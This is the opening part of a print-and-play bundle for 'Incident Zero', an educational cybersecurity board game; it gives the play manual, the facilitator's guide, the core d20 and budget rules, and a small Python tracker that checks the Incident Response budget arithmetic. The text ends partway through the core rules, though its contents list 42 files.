INCIDENT ZERO

Complete Game (All 6 Modules) — Print & Play Bundle · v2.2 Playtest Edition

A cybersecurity board game by RetroVerse Studios · CC BY-NC-SA 4.0

Print this file (Ctrl/Cmd+P) or read on screen. Card pages print best on cardstock.

Contents:
  1. docs/HOW_TO_PLAY.md
  2. docs/TO_GUIDE.md
  3. docs/rules/core-rules.md
  4. docs/FRAMEWORK.md
  5. docs/module-combinations.md
  6. docs/VARIABLE_GAME_LENGTH_SYSTEM.md
  7. docs/rules/module-network-building.md
  8. docs/standalone-games/network-building.md
  9. cards/network-building/core-deck/server-cards.md
  10. cards/network-building/core-deck/security-device-cards.md
  11. cards/network-building/core-deck/architecture-cards.md
  12. cards/network-building/core-deck/asset-cards.md
  13. cards/network-building/standalone/business-requirement-cards.md
  14. cards/network-building/standalone/operational-event-cards.md
  15. cards/network-building/expansion-deck/legacy-systems.md
  16. cards/network-building/expansion-deck/cloud-variants.md
  17. docs/rules/module-hardening.md
  18. docs/standalone-games/hardening.md
  19. cards/hardening/core-deck/defense-cards.md
  20. cards/hardening/core-deck/pentester-tactic-cards.md
  21. cards/hardening/expansion-deck/advanced-tactics.md
  22. docs/rules/module-incident-response.md
  23. docs/standalone-games/incident-response.md
  24. cards/incident-response/core-deck/threat-defense-cards.md
  25. cards/incident-response/expansion-deck/advanced-threats.md
  26. cards/incident-response/expansion-deck/advanced-defenses.md
  27. docs/rules/module-disaster-recovery.md
  28. docs/standalone-games/disaster-recovery.md
  29. cards/disaster-recovery/core-deck/crisis-action-cards.md
  30. cards/disaster-recovery/core-deck/event-cards.md
  31. cards/disaster-recovery/core-deck/stakeholder-cards.md
  32. cards/disaster-recovery/expansion-deck/advanced-scenarios.md
  33. docs/rules/module-forensics.md
  34. docs/standalone-games/forensics.md
  35. cards/forensics/core-deck/investigation-cards.md
  36. cards/forensics/core-deck/evidence-cards.md
  37. docs/rules/module-audit-compliance.md
  38. docs/standalone-games/audit-compliance.md
  39. cards/audit-compliance/core-deck/audit-domain-cards.md
  40. cards/audit-compliance/expansion-deck/compliance-frameworks.md
  41. cards/print-templates/tracker-sheets.md
  42. cards/CARD_REFERENCE.md

docs/HOW_TO_PLAY.md

How to Play Incident Zero

Version: 2.2 - Playtest Edition
Read time: ~15 minutes. First game: ~45 minutes.

This is the learn-to-play manual — read it once, run your first game, then use the module rules as reference during play. Exact tables and numbers live in the reference docs; this manual teaches the flow.


1. What Is This Game?

Incident Zero is a cybersecurity board game for classrooms and training rooms. One player is the Threat Orchestrator (TO) — part facilitator, part adversary, part narrator. Everyone else is the Blue Team: security defenders making decisions under budget and time pressure.

The game's signature rule: you get better dice odds by explaining your reasoning like a real analyst. Say "we investigate suspicious activity" and you roll flat. Say "we pull the mail gateway logs to check the sender's real IP against threat intel" and you roll at +3. Talking like a professional is literally how you win — that's the point.

There are 6 modules covering the security lifecycle. Each is a standalone 30-45 minute game; they also chain together (the outcome of one feeds the setup of the next). This manual teaches Incident Response first — it's the flagship and the best hook.

2. What You Need

3. The Core Loop (all modules)

Every module runs on the same engine:

  1. Turns. A fixed number of turns (announced at setup). Each turn: start-of-turn penalties → 2-3 minutes of team discussion → ONE team action → end of turn.
  2. Budget. One shared pool representing money, staff, and time. Every action costs Budget. Run dry and you can't act.
  3. The d20 roll. Uncertain actions need roll + modifiers ≥ 11.
  4. Justification modifiers. +2 for strong technical reasoning (methodology — why this approach works), +1 for naming real tools or techniques (Wireshark, EDR, Mimikatz, a MITRE technique). The TO judges honestly; vague = +0.
  5. Debrief. Every session ends with 5-10 minutes of "what happened, why, what would you do differently." This is where the learning locks in — don't skip it.

4. Your First Game: Incident Response (Beginner)

The setup (TO does this privately, 5 min): An attacker is inside the fictional company's network. The TO secretly builds a 3-card attack chain in kill-chain order and keeps it face-down:

Suggested first chain: T-01 Phishing Campaign (INITIAL COMPROMISE / SOCIAL ENGINEERING) → T-04 Lateral Movement via SMB (PIVOT & ESCALATE / NETWORK) → T-07 Scheduled Task Persistence (PERSISTENCE / MALWARE)

The three actions (Blue Team picks ONE per turn):

Action | Cost | On success (roll+mods ≥ 11)
---|---|---
Investigate | 5 | 1st success on a link = the TO gives a clue. 2nd success on the same link = card revealed!
Deploy Defense | 10/15/25 by tier | If the card's vector AND chain step match the hidden card = revealed immediately. Partial match = defense stays on the table and gives +2 to future rolls against any link matching its vector
Emergency Response | 15 | No roll. Contain one already-revealed threat (removes its ongoing penalty)

The pressure (TO applies at the START of each turn):
- Active Breach Cost: -5 Budget while any chain card is still unrevealed (the breach is burning money whether you see it or not)
- Uncontained Threats: -5 Budget per revealed-but-uncontained threat (revealing the next card in the chain auto-contains the previous one)

When a card is revealed, the team immediately picks ONE reward: draw 2 Defense cards, +10 Budget, or Fast-Track (next Investigate succeeds on 5+).

Scripted opening — read this at the table

TURN 1. TO: "Start of turn: one attacker action is still hidden — Active Breach Cost, minus 5. Budget: 95. Something is wrong at Meridian Logistics: the helpdesk queue is full of password-reset complaints. What do you do?" Team (after discussion): "Investigate. We pull the mail gateway logs and check sender domains against our threat-intel feed — if this is phishing, the return-path won't match the display name." TO: "That's a real methodology and a real tool — +2 and +1. Roll." Rolls 9. 9+3 = 12 ≥ 11 — success. TO reads a clue from T-01: "Several employees received emails claiming to be from IT, asking them to 're-authenticate'. The link goes to a look-alike domain registered 4 days ago." (First success on this link — clue only. Budget: 95 - 5 = 90.)

TURN 2. TO: "Active Breach Cost, minus 5. Budget: 85." Team: "Keep digging on the phishing — we check the mail gateway for who clicked, and pull those workstations' proxy logs." TO: "+2, +1. Roll." Rolls 10. 13 ≥ 11 — second success on the same link. TO flips T-01 face-up: "Phishing Campaign — revealed! Three users entered credentials on the fake page. This threat is now uncontained. Choose a reward." Team takes Budget Grant: 85 - 5 + 10 = 90.

TURN 3. TO: "Two cards still hidden: Active Breach minus 5. One uncontained threat: minus 5. Budget: 80. You know how they got in — you don't yet know where they went." From here, you're on your own. (A strong play: Deploy the Network Segmentation defense — if the next hidden card is network lateral movement, vector + step match reveals it instantly and auto-contains the phishing.)

How it ends

Debrief prompts: What did you spend the most on, and was it worth it? Which clue actually changed your next decision? What one defense, bought before turn 1, would have changed everything?

5. The Other Five Modules (one paragraph each)

Chaining modules: outcomes carry forward (audit gaps raise your DR costs; an IR loss sets up DR; IR's revealed chain seeds Forensics). See Module Combinations. Full lifecycle = all six in sequence, 4-5 hours across sessions.

6. Where to Go Next

You want... | Read
---|---
You're the Threat Orchestrator | The TO Guide — the role, judging justifications, per-module screens
Exact rules for a module | docs/rules/ — core + one file per module
Solo/standalone setup for any module | docs/standalone-games/
Every card, indexed | cards/CARD_REFERENCE.md
To run a playtest and report back | docs/playtesting/
Variable game length & difficulty tiers | core-rules §3a

7. Quick Reference (photocopy this)

Roll: d20 + modifiers ≥ 11 · +2 strong justification · +1 real tool/technique named · +2 matching deployed defense (IR)
IR costs: Investigate 5 · Deploy 10/15/25 · Emergency Response 15
IR start-of-turn: -5 while any card hidden · -5 per uncontained revealed threat
Reveal: 2 successful Investigates on a link, or 1 full-match Deploy (vector + step) · always the earliest unrevealed card
Reward per reveal (pick 1): 2 Defense cards / +10 Budget / next Investigate succeeds on 5+
Turn limit: (chain cards × 2) + 1 → 3 cards = 7 turns
Budgets: NB 40-60 · DR 50 · Forensics 75 · IR 100 · Audit 100 · Hardening 150

docs/TO_GUIDE.md

The Threat Orchestrator's Guide

Version: 2.2 - Playtest Edition
Audience: anyone about to run Incident Zero — teacher, trainer, or the friend who volunteered.


1. The Role

The Threat Orchestrator (TO) is Incident Zero's dungeon master. You wear three hats, usually in the same minute:

If you've ever run a tabletop RPG, you already have 80% of this. The remaining 20% is the adjudication rubric in §4 — it's the part that makes this game educational rather than just thematic.

A good TO makes the game. The same scenario is flat or unforgettable depending on how you deliver clues and how honestly you judge reasoning. That's why this guide exists.

2. Golden Rules

  1. Be fair, not nice. Never fudge dice — in either direction. The rules already give you legitimate difficulty dials (§5); use those, not your thumb on the d20.
  2. Never block on ignorance. If players are stuck, sell them a hint through the fiction ("your SOC junior suggests looking at outbound traffic...") rather than letting three turns die in silence.
  3. Announce costs before actions. "That's 15 Budget — confirm?" prevents every argument you'd otherwise have.
  4. Explain outcomes. Success or failure, say why in security terms. The explanation is the lesson; the roll is just pacing.
  5. Keep the clock. 2-3 minutes of planning per turn, firmly. Deliberation past that point is quarterbacking, not strategy.
  6. Let them be wrong. A confidently wrong plan that fails teaches more than a corrected plan that succeeds. Save the correction for the debrief.

3. Session Prep (15 minutes)

4. Judging Justifications (the heart of the job)

The +2/+1 modifiers are the game's teaching engine. Your consistency is what makes them meaningful.

+2 — Strong technical justification. The player explains methodology: what they'll look at, and why that would reveal or stop this specific thing.
- ✅ "We pull the mail gateway logs and compare the return-path against the display-name domain — spoofed senders won't match." (mechanism stated)
- ✅ "Deploy EDR because living-off-the-land attacks won't trip signature AV — we need behavioral detection." (threat-to-control logic)
- ❌ "We investigate the email server thoroughly." (a location is not a method)

+1 — Real tool or technique named. Wireshark, Splunk queries, Mimikatz, a MITRE technique ID, an actual CVE.
- ✅ "Check LSASS access events — that's Mimikatz behavior, T1003."
- ❌ "We use our security tools." (no it isn't)

Rulings that keep it fair:
- Judge the reasoning, not the vocabulary. A beginner saying "check if the email really came from who it says" in plain words has the mechanism — award the +2. A buzzword salad without a mechanism gets +0.
- Consistency beats generosity. Whatever bar you set on turn 1 is the bar all game.
- Escalate the bar as the group learns — by session three, "we check the SIEM" that earned +1 in session one should need a specific query. Announce the escalation openly ("you're professionals now — I want specifics").
- Expert groups ("Expert Mode"): award +2 only for named artifacts, ATT&CK technique IDs, or detection logic. This is the challenge ceiling for practitioner tables — the card math never has to change.
- One player monologuing every justification? Ask a different player to give it each turn ("Sam, you're on comms — why does this matter to the regulator?").

5. Difficulty Dials (live, legitimate)

Signs it's too easy: no failed rolls; goal in sight with 40+ Budget spare; players bored. Signs it's too hard: no progress for 3+ turns; consecutive failures; frustration replacing discussion.

Easier (pick 1-2) | Harder (pick 1-2)
---|---
Richer clues (more specific detail per success) | Vaguer clues (accurate but terse)
Suggest an angle through the fiction | Expert-mode justification bar
Shorter chain / lower tier next game | Longer chain, expansion cards
Beginner budgets (module max) | Minimum budgets

Never adjust by fudging a roll or changing a printed number mid-game — players smell it, and it teaches that outcomes are arbitrary.

6. Failure Modes (yours, not theirs)

Failure | Symptom | Fix
---|---|---
The Encyclopedia | You lecture after every roll | One sentence of "why," save the rest for debrief
The Softie | Everyone always gets +2 | Re-read §4; require the mechanism
The Sphinx | Clues so cryptic nobody moves | Clues must be actionable: each should suggest at least one sensible next investigation
The Railroader | You steer them to your solution | Multiple paths are valid; score the outcome, not the route
The Accountant | You narrate numbers, not events | Lead with fiction, then state the numbers
The Rusher | Debrief skipped because time ran out | Protect the last 10 minutes like it's the win condition — it is

7. Module Panels (your screen, one per module)

🔎 Incident Response — you are the hidden attacker

🛡️ Hardening — you become the pentester mid-game

🏗️ Network Building — you are the demanding business

🚨 Disaster Recovery — you are the crisis itself

🔬 Forensics — you are the evidence

📋 Audit & Compliance — you are the organization under review

8. Running the Debrief (10 minutes, non-negotiable)

Three rounds, in order: What happened? (players narrate, you correct only facts) → Why did it work that way? (connect two or three key moments to real-world security — this is where you finally get to lecture, briefly) → What would you do differently? (go around the table; everyone answers). Losses debrief better than wins: read any unrevealed cards' "Why This Works" text aloud — it's the payoff for losing.

9. First Session? Do This

  1. Run beginner Incident Response with the scripted opening in How to Play §4 — your first two turns are literally written out
  2. Keep the tracker sheet visible to everyone; public state builds trust in your fairness
  3. Log frictions on the session notes form — your confusion is playtest data too
  4. Forgive yourself one rules mistake per session; announce it, fix it forward, don't replay

docs/rules/core-rules.md

Incident Zero: Core Rules & Mechanics

Version: 2.2 - Playtest Edition
Last Updated: October 2025


Core Concept 🎯

Incident Zero is a modular cybersecurity board game for 2+ players designed for educational environments. One player acts as the Threat Orchestrator (TO) (the facilitator), while all other players form Blue Teams (the Defenders).

How It Works

Players choose which module(s) to play based on learning objectives:

  1. Network Building Module - Design and secure infrastructure (30-45 min)
  2. Hardening Module - Build defense-in-depth (30-45 min)
  3. Incident Response Module - Detect and investigate hidden attack chains (30-45 min)
  4. Disaster Recovery Module - Manage breach crisis (30-45 min)
  5. Forensics Module - Investigate and attribute attacks (30-45 min) NEW in v2.1
  6. Audit & Compliance Module - Conduct security assessments (30-45 min)

Modules can be played solo or combined in any sequence using the modifier generation procedures documented in FRAMEWORK.md and Module Combinations.


Game Components (Universal)

Card Types

Threat Cards

Represent attacker actions. Each card includes:
- Title: e.g., "Phishing Campaign"
- Attack Chain Step: INITIAL COMPROMISE, PIVOT & ESCALATE, PERSISTENCE, or C2 & EXFIL
- Attack Vector: SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, or DATA EXFIL
- Clue: Descriptive text for the Threat Orchestrator
- Why This Works: Educational explanation (revealed after discovery)

Deck Composition:
- 12 Base Threat Cards (see cards/incident-response/core-deck/threat-defense-cards.md)
- 8 Expansion Threat Cards (see cards/incident-response/expansion-deck/advanced-threats.md)


Defense Cards

Represent security controls. Each card includes:
- Title: e.g., "Multi-Factor Authentication"
- Countermeasure Vector: One of the six attack vectors
- Tier: BASIC (10 Budget), ADVANCED (15 Budget), or ELITE (25 Budget)
- Description: What the defense does and when it applies

Deck Composition:
- 24 Base Defense Cards (see cards/incident-response/core-deck/threat-defense-cards.md)
- 19 Expansion Defenses (see cards/incident-response/expansion-deck/advanced-defenses.md)

Examples:
- BASIC: Email Authentication Setup, User Security Training, Firewall Rules (10 Budget)
- ADVANCED: Multi-Factor Authentication, EDR, Network Segmentation (15 Budget)
- ELITE: Threat Hunting, Memory Forensics, Deception Technology (25 Budget)


Pentester Tactic Cards

Represent sophisticated attack techniques used in Hardening module (and potentially others).

8 Core Tactics (PT-01 to PT-08):
  1. PT-01: Social Engineering - Pretexting Attack
  2. PT-02: Malware Evasion - Living-off-the-Land Technique
  3. PT-03: Credential Dumping - Mimikatz Attack
  4. PT-04: Lateral Movement - Network Traversal
  5. PT-05: Privilege Escalation - Unpatched Kernel Exploit
  6. PT-06: Data Exfiltration - Unmonitored Channel
  7. PT-07: Supply Chain Compromise - Trusted Software Update
  8. PT-08: Insider Threat - Malicious Administrator

See cards/hardening/core-deck/pentester-tactic-cards.md for full card text, plus 8 expansion tactics (PT-09 to PT-16) in advanced-tactics.md.


Asset Cards

Simple cards providing scenario context. Examples:
- Email Server
- Customer Database
- Domain Controller
- Web Application
- Backup System
- Developer Workstation


Game Materials Required

Physical Components:
- One 20-sided die (d20)
- Turn Tracker (paper or board, counts 1-12+)
- Budget Tracker (shows 0-150+)
- Reputation/Security Score Tracker (shows 0-100)
- Uncontained Threats Tracker (shows 0-5)
- Tokens or counters (for tracking upgrades, penalties)

Optional:
- Score sheets (printable or paper)
- Playbook tracking sheet
- Stakeholder communication log (for Disaster Recovery)


Universal Game Mechanics

1. The d20 Roll System

When Used: Investigation, Defense Deployment, Negotiation, and similar actions that have uncertain outcomes.

How It Works:
  1. Player announces action and parameters
  2. Player rolls 1d20 (one 20-sided die)
  3. Compare result to target number (usually 11+) plus modifiers
  4. Success if: roll + modifiers ≥ target number

Example:

Action: Investigate email headers
Target: 11+
Roll: 7
Modifiers: +2 (technical justification) +1 (referenced Splunk)
Calculation: 7 + 2 + 1 = 10
Result: FAIL (10 < 11)

2. Budget System (Universal)

What is Budget? Abstract resource representing time, money, personnel, and tools. Spent to take actions, buy defenses, or conduct investigations.

Budget Allocation by Module:
- Network Building: Start at 40-60 (by difficulty; see module rules)
- Hardening: Start at 150 (or carry over from IR)
- Incident Response: Start at 100
- Disaster Recovery: Start at 50 (emergency fund)
- Forensics: Start at 75
- Audit & Compliance: Start at 100 (used only for optional remediation cards)

Budget Spending:
- Investigate action: 5 Budget
- Deploy Defense: 10/15/25 Budget (by tier)
- Emergency Response (IR): 15 Budget (v2.2; was 25)
- Active Breach Cost (IR, v2.2): -5 Budget at start of each turn while any chain card remains unrevealed
- Harden Upgrade (Hardening): 5 Budget
- Create Playbook (Hardening): 10 Budget
- Crisis Action cards (DR): 5-20 Budget per card (ACTION-01 to ACTION-12; the free "Holding Statement" costs 0)
- Ransom Decision (DR, ACTION-13): Pay 20 / Negotiate 5 / Refuse 0

Budget = 0: Team loses (cannot take further actions)

Exception (Disaster Recovery, v2.2): Budget floor is 0 and the free Holding Statement action remains available — DR is never lost by running out of Budget; DR's loss condition is any stakeholder trust reaching 0%.


3. Turn System (Universal)

Turns represent: Time passing in the game world (6 hours, 30 minutes, or abstract unit depending on module)

Turn Sequence:
  1. Start of Turn: Penalties applied, trackers announced
  2. Planning Phase: Team discusses strategy (2-3 min)
  3. Action Phase: Execute chosen action, resolve rolls
  4. End of Turn: Advance tracker, draw card, check events


3a. Variable Game Length System (v2.1 - New!)

Philosophy: In real incident response, some attacks move fast (hours), some take months. Fixed turn lengths feel unrealistic. This system adds realism without requiring complex calculations.

For Beginners & Quick Play: Default Formula

Default Formula: (Attack Chain Cards × 2) + 1

This gives attackers enough time to progress realistically while keeping games manageable:

Attack Chain | Formula | Turn Count | Session Duration
---|---|---|---
3 cards | (3 × 2) + 1 | 7 turns | 30-40 min play
4 cards | (4 × 2) + 1 | 9 turns | 35-45 min play
5 cards | (5 × 2) + 1 | 11 turns | 40-50 min play
6 cards | (6 × 2) + 1 | 13 turns | 45-55 min play

How to Use Default Formula:
  1. Choose number of threat cards in attack chain (3, 4, 5, or 6)
  2. Apply formula: (Cards × 2) + 1 = Turn Count
  3. Announce turn count to Blue Team
  4. Play game normally with that turn limit

Example Setup:

"I've created a 4-card attack chain. That's (4 × 2) + 1 = 9 turns. You have 9 turns to detect all four threats. Go!"


For Advanced Players: Complexity Tiers (v2.1)

Advanced Threat Orchestrators can use a Tier + d4 system for more control and variability:

Step 1: Select Attack Complexity Tier

Tier | Turn Base | Attack Profile | Example
---|---|---|---
TIER 1 | 5-7 | Simple & obvious | Script kiddie using public tools
TIER 2 | 8-10 | Standard sophistication | Organized cybercriminal group
TIER 3 | 11-13 | Highly sophisticated | APT with operational security
TIER 4 | 14-16 | Expert/Nation-state | State-sponsored group

Step 2: Add Randomness (Optional)

Roll 1d4 for variation:
- Roll 1: -1 turn (tight timeline)
- Roll 2 or 3: ±0 turns (no change)
- Roll 4: +1 turn (extended dwell time)

Final Turn Count = Tier Base + d4 Result

Example Advanced Setup:

"This is a TIER 2 attack (organized cybercriminals). Base is 8-10 turns. I'll roll d4 for variation... [rolls 4, +1 turn]. Final turn count: 9-11 turns."


Critical Game Integrity Rules (v2.1)

These rules protect game balance and prevent metagaming:

Rule 1: Accept Any Roll (Even If It Feels Wrong)

The Rule: Threat Orchestrators MUST accept the random result, even if it feels impossibly tight or loose.

Why: Real incident response is unpredictable. Sometimes attacks happen faster or slower than expected.

Example Scenarios:
- TIER 3 attack (11-13 base) + d4 roll of 1 = 10-12 turns (tighter than expected, but realistic)
- TIER 1 attack (5-7 base) + d4 roll of 4 = 6-8 turns (easier conditions, but acceptable)

When Chaos Feels Realistic:
- Tight timeline: "The attacker worked faster than expected—they had prior knowledge"
- Loose timeline: "The attacker was cautious, spending weeks in reconnaissance before striking"

Implementation: Lean into the randomness as realistic incident variability.


Rule 2: Players Cannot Question Tier Based on Turn Count

The Rule: Blue Team CANNOT deduce the attack tier from the announced turn count. They cannot ask "Is this TIER 2?" or "Is this TIER 4?" based on how many turns they have.

Why: Real incident response doesn't come with difficulty labels. Attackers don't advertise sophistication. Players should discover complexity through gameplay (attack chain complexity, defender evasion, tool sophistication, etc.).

What Players CAN Ask:
- "What are the suspicious network events?" (leads to understanding threats)
- "Can we analyze the malware?" (reveals attacker sophistication through findings)
- "Why did this attack succeed?" (post-game discussion)

What Players CANNOT Ask:
- "Is this a TIER 2 attack?" (deriving tier from turn count)
- "This looks like a TIER 1 because we have 7 turns" (meta-gaming difficulty)

Implementation: Respond to difficulty questions by saying "Investigate and find out!" Players discover sophistication through evidence, not from turn counts.


Rule 3: TO Modifier Authority (Rare & Optional)

The Rule: ONLY after rolling d4, the Threat Orchestrator may apply an optional ±1 turn adjustment IF the rolled result feels genuinely unreasonable for the scenario.

When to Use (Rare):
- Scenario setup is unusually complex (multiple attack vectors, coordination across systems)
- Player group is new and needs slightly easier conditions
- Real-world incident being taught had specific timeline constraints

When NOT to Use (Prefer Random):
- "The roll feels unlucky" (accept the chaos)
- "I want this exactly 10 turns" (let dice decide)
- "The attack chain is long so it should take longer" (that's what the TIER system handles)

Implementation:
  1. Roll d4 normally
  2. Announce rolled result
  3. ONLY IF genuinely unreasonable, apply ±1 modifier and explain why
  4. Document the override for consistency in future scenarios

Example Valid Use:

"TIER 2 base 8-10, rolled -1 = 7-9 turns. That's tight given we have 5-card attack chain, so I'm adding +1 modifier (explaining the discovery is methodical). Final: 8-10 turns."

Example Invalid Use:

"I rolled 8-10 but I want 10-12, so I'm adding +2." (NO - use the roll as-is)


Implementation Checklist

For Beginners (Use Default Formula):
- [ ] Choose attack chain length (3, 4, 5, or 6 cards)
- [ ] Calculate: (Cards × 2) + 1
- [ ] Announce turn count
- [ ] Play

For Advanced (Use Tier + d4):
- [ ] Select TIER (1, 2, 3, or 4)
- [ ] Announce TIER basis (not the number, just why it's that complexity)
- [ ] Roll d4 for variation (hidden or public, your choice)
- [ ] Calculate final turn count
- [ ] Apply Rule 3 modifier if genuinely needed (rare)
- [ ] Announce final turn count WITHOUT revealing tier


Quick Reference Card

Default Formula: Turn Count = (Attack Cards × 2) + 1

Tier System:
- TIER 1: 5-7 turns (simple)
- TIER 2: 8-10 turns (standard)
- TIER 3: 11-13 turns (advanced)
- TIER 4: 14-16 turns (expert)
- Add d4 roll: -1, 0, 0, or +1

Golden Rules:
  1. Accept any roll (embrace chaos)
  2. Never reveal tier to players
  3. Modifier authority only when truly needed (rare)


4. Roll Modifiers (Universal)

All modules use the same modifier system for consistency:

+2 Bonus: Strong Technical Justification

Awarded when a player provides clear, specific reasoning for their action using real security concepts.

Examples:
- "We're analyzing email headers in the mail gateway logs to identify the true sender IP and check it against threat intelligence feeds"
- "We're deploying EDR on all endpoints because it can detect living-off-the-land techniques"
- "We're querying our SIEM for scheduled task creation events because attackers use them for persistence"

Criteria:
- References specific tools (Splunk, EDR, SIEM, etc.)
- Explains methodology (why this approach works)
- Shows understanding of the threat being addressed


+1 Bonus: Real Tools or Techniques Referenced

Awarded when player references actual security tools or real attack/defense techniques.

Examples:
- "We'll use Wireshark to analyze the network traffic"
- "We're checking for Mimikatz usage in memory"
- "We're reviewing EDR telemetry"
- "We're looking for this specific CVE exploitation pattern"

Criteria:
- References real tools (Wireshark, EDR, Splunk, etc.)
- References real techniques (MITRE ATT&CK, specific CVEs)
- Shows awareness of how things actually work


5. Uncontained Threats Penalty (Incident Response Module)

When Applied: Incident Response module only, applied at START of each turn

How It Works:
  1. When a threat card is revealed, add 1 to Uncontained Threats Tracker
  2. At START of each turn, deduct 5 Budget per uncontained threat
  3. When next card in chain is revealed, previous threat is auto-mitigated (-1 from tracker)
  4. When Emergency Response action is used (15 Budget), remove a revealed threat (-1 from tracker)

Companion rule — Active Breach Cost (v2.2): while at least one chain card remains unrevealed, deduct an additional flat -5 Budget at the start of each turn. Hidden attackers cost money too.

Purpose: Creates urgency - dwell time costs money, whether you've found the attacker yet or not. Teaches real-world incident response costs.

Example (uncontained penalty only; Active Breach Cost also applies while cards remain hidden):

Turn 1: Phishing revealed → Uncontained Threats = 1
Turn 2: START → Deduct 5 Budget (95 remaining from 100)
Turn 3: Lateral Movement revealed → Phishing auto-mitigated (Uncontained = 1)
Turn 3: START → Deduct 5 Budget
Turn 4: Emergency Response on Lateral Movement (15 Budget) → Uncontained Threats = 0
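The Incident Response money loop from How to Play §4 and this section, written out as an added Python tracker for checking the arithmetic during playtests (example code, not part of the Incident Zero bundle). It replays the scripted opening to confirm the announced Budgets come out as printed. Class and function names are assumptions, and the Fast-Track reward is assumed to mean roll + modifiers ≥ 5.

```python
from dataclasses import dataclass, field

INVESTIGATE_COST = 5
DEPLOY_COST = {"BASIC": 10, "ADVANCED": 15, "ELITE": 25}
EMERGENCY_COST = 15
ACTIVE_BREACH_COST = 5   # start of turn, while any chain card is still hidden
UNCONTAINED_COST = 5     # start of turn, per revealed-but-uncontained threat
TARGET = 11              # d20 + modifiers must reach this
FAST_TRACK_TARGET = 5    # after the Fast-Track reward (assumed to apply to roll + mods)
STARTING_BUDGET = 100


@dataclass
class ChainCard:
    code: str        # e.g. "T-01"
    step: str        # e.g. "INITIAL COMPROMISE"
    vector: str      # e.g. "SOCIAL ENGINEERING"
    revealed: bool = False
    contained: bool = False
    successes: int = 0   # successful Investigates against this link so far


@dataclass
class IRGame:
    chain: list
    budget: int = STARTING_BUDGET
    turn: int = 0
    fast_track: bool = False
    deployed_vectors: list = field(default_factory=list)

    def turn_limit(self):
        return len(self.chain) * 2 + 1   # Variable Game Length default formula

    def current_link(self):
        return next((c for c in self.chain if not c.revealed), None)   # earliest unrevealed

    def start_turn(self):
        """Apply the start-of-turn penalties; returns the Budget the TO announces."""
        self.turn += 1
        if self.current_link() is not None:
            self.budget -= ACTIVE_BREACH_COST
        self.budget -= UNCONTAINED_COST * sum(c.revealed and not c.contained for c in self.chain)
        return self.budget

    def modifiers(self, strong_reasoning, named_tool):
        """+2 methodology, +1 real tool named, +2 deployed defense matching the link's vector."""
        link = self.current_link()
        defense = 2 if link is not None and link.vector in self.deployed_vectors else 0
        return (2 if strong_reasoning else 0) + (1 if named_tool else 0) + defense

    def _reveal(self, card, reward):
        card.revealed = True
        idx = self.chain.index(card)
        if idx > 0:   # revealing the next card auto-contains the previous one
            self.chain[idx - 1].contained = True
        if reward == "budget":
            self.budget += 10
        elif reward == "fast_track":
            self.fast_track = True
        # reward == "defense_cards" draws 2 Defense cards; the hand is not tracked here

    def investigate(self, roll, strong_reasoning, named_tool, reward="budget"):
        """Returns 'fail', 'clue' (1st success on the link) or 'revealed' (2nd)."""
        card = self.current_link()
        assert card is not None, "every chain card is already revealed"
        self.budget -= INVESTIGATE_COST
        target = FAST_TRACK_TARGET if self.fast_track else TARGET
        self.fast_track = False
        if roll + self.modifiers(strong_reasoning, named_tool) < target:
            return "fail"
        card.successes += 1
        if card.successes < 2:
            return "clue"
        self._reveal(card, reward)
        return "revealed"

    def deploy(self, tier, vector, step, reward="budget"):
        """No roll: vector AND step match reveals the card; otherwise the defense stays."""
        card = self.current_link()
        self.budget -= DEPLOY_COST[tier]
        if card is not None and card.vector == vector and card.step == step:
            self._reveal(card, reward)
            return "revealed"
        self.deployed_vectors.append(vector)   # gives +2 against links matching its vector
        return "deployed"

    def emergency_response(self, card):
        self.budget -= EMERGENCY_COST   # no roll: contain one already-revealed threat
        card.contained = True


def scripted_opening():
    """Replay How to Play §4 turns 1-3; returns the game and the Budget after each step."""
    game = IRGame(chain=[ChainCard("T-01", "INITIAL COMPROMISE", "SOCIAL ENGINEERING"),
                         ChainCard("T-04", "PIVOT & ESCALATE", "NETWORK"),
                         ChainCard("T-07", "PERSISTENCE", "MALWARE")])
    trace = [game.start_turn()]                 # turn 1: 100 - 5 (Active Breach Cost)
    for roll in (9, 10):                        # 9+3 = 12: clue; 10+3 = 13: T-01 revealed, +10
        game.investigate(roll=roll, strong_reasoning=True, named_tool=True)
        trace.append(game.budget)
        trace.append(game.start_turn())         # turn 3 also pays -5 for uncontained T-01
    return game, trace                          # trace should read 95, 90, 85, 90, 80
```

Continuing from turn 3 with the "strong play" the manual suggests (Network Segmentation against T-04) shows the auto-contain and the partial-match +2 working together.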

Common Roles & Responsibilities

Threat Orchestrator (Facilitator)

Responsibilities:
- Manage game state and track turns/budget
- Describe scenarios and outcomes
- Roll dice when action outcomes are uncertain
- Guide the narrative

During Incident Response:
- Create and manage hidden attack chain
- Provide clues based on successful investigations
- Control Uncontained Threats penalties
- Be fair but challenging

During Other Modules:
- Describe threat context and defenses
- Draw Pentester Tactic cards (Hardening)
- Manage timeline and deadlines (Disaster Recovery)
- Guide debrief questions

Universal Tips:
- Explain why actions succeed or fail
- Ask clarifying questions about player strategy
- Balance challenge with learning
- Provide constructive feedback


Blue Team (Defenders)

Responsibilities:
- Discuss strategy as a team
- Choose one action per turn
- Justify your decisions (gain +2 modifier)
- Manage budget carefully
- Learn from success and failure


Modifier Stacking Rules

Key Rule: Modifiers are additive and can stack.

Example (Hardening Module, canonical formula — v2.2):

Pentester Tactic: PT-02 Living-off-the-Land (DC 13)

Defense roll = d20
  + printed bonus for the ONE defense chosen (D-08 EDR vs PT-02: +3)
  + hardening upgrades on that defense (+2 each; one upgrade: +2)
  + relevant playbook (+3)

Team rolls 8:
8 + 3 (EDR) + 2 (upgrade) + 3 (playbook) = 16 ≥ 13 = SUCCESS

Only the single chosen defense's printed bonus applies — deployed defenses do not stack with each other against one tactic.


Difficulty & Scaling

By Attack Chain Length

Length | Difficulty | Best For
---|---|---
3 cards | Beginner | Learning mechanics, 30 min sessions
4 cards | Intermediate | Standard play, 40 min sessions
5 cards | Advanced | Challenge play, full kill chain

By Starting Budget

Budget | Difficulty | Best For
---|---|---
60 | Hard | Resource scarcity, tough choices
100 | Standard | Balanced play, most scenarios
150+ | Easy | Strategic depth, multiple options

By Turn Limit

Turns | Difficulty | Best For
---|---|---
8 | Hard | Time pressure, fast play
10 | Standard | Balanced, most scenarios
12 | Easy | Exploration, learning

Note (v2.2): Incident Response derives its turn limit from the Variable Game Length formula — (Attack Chain Cards × 2) + 1 → 7/9/11 turns (see §3a). The table above is for modules with educator-set limits.


Educational Objectives

By Module

Module | Primary Learning | Secondary Learning
---|---|---
Incident Response | Cyber kill chain, attack detection, investigation | Resource prioritization, incident response
